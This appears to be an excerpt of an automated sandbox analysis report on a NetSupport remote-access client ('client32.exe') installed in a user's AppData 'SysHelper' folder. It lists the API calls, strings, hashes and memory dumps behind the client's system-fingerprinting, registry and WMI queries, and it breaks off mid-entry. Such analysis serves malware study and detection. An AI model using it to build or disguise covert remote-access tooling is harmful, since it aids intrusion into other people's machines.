                                                                                                                        • API String ID: 2669163067-206650970
                                                                                                                        • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                        • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                        • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                        • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                        APIs
                                                                                                                        • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                        • KillTimer.USER32(00000000,00007F30,TermUI...), ref: 111393C3
                                                                                                                        • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113943B
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeKillLibraryTimer
                                                                                                                        • String ID: TermUI
                                                                                                                        • API String ID: 2006562601-4085834059
                                                                                                                        • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                        • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                        • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                        • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen
                                                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                        • API String ID: 47109696-3245241687
                                                                                                                        • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                        • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                        • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                        • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                          • Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                          • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                        • API String ID: 806825551-1858614750
                                                                                                                        • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                        • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                        • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                        • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101755C
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                        • API String ID: 2994556011-578995875
                                                                                                                        • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                        • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                        • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                        • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                          • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                        • ResetEvent.KERNEL32(000000E0), ref: 111408D9
                                                                                                                        • SetEvent.KERNEL32(000000E0), ref: 111408EF
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                        • String ID: MiniDump
                                                                                                                        • API String ID: 1494854734-2840755058
                                                                                                                        • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                        • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                        • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                        • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 11017472
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                        • API String ID: 2994556011-2037925671
                                                                                                                        • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                        • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                        • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                        • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                          • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 68598EBF
                                                                                                                          • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                        • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                        • API String ID: 3215810784-3459472706
                                                                                                                        • Opcode ID: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
                                                                                                                        • Instruction ID: 2e7df5cad1e1d205e57a65cd7d462213f867fb545e006c7e25943846b542b7cb
                                                                                                                        • Opcode Fuzzy Hash: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
                                                                                                                        • Instruction Fuzzy Hash: 6111C879A801559FEF10DA55DC51BFEB364EB45305FC00455EE2DE3240EB319E44CB66
                                                                                                                        APIs
                                                                                                                        • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                        • wsprintfA.USER32 ref: 11143416
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                        • API String ID: 1985783259-2296142801
                                                                                                                        • Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                        • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                        • Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                        • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 11031376
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                        • String ID: %s%s.bin$226546$clientinv.cpp$m_pDoInv == NULL
                                                                                                                        • API String ID: 4180936305-3869819624
                                                                                                                        • Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                        • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                        • Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                        • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
                                                                                                                        • __strdup.LIBCMT ref: 11140D17
                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                          • Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E
                                                                                                                        • _free.LIBCMT ref: 11140D4C
                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
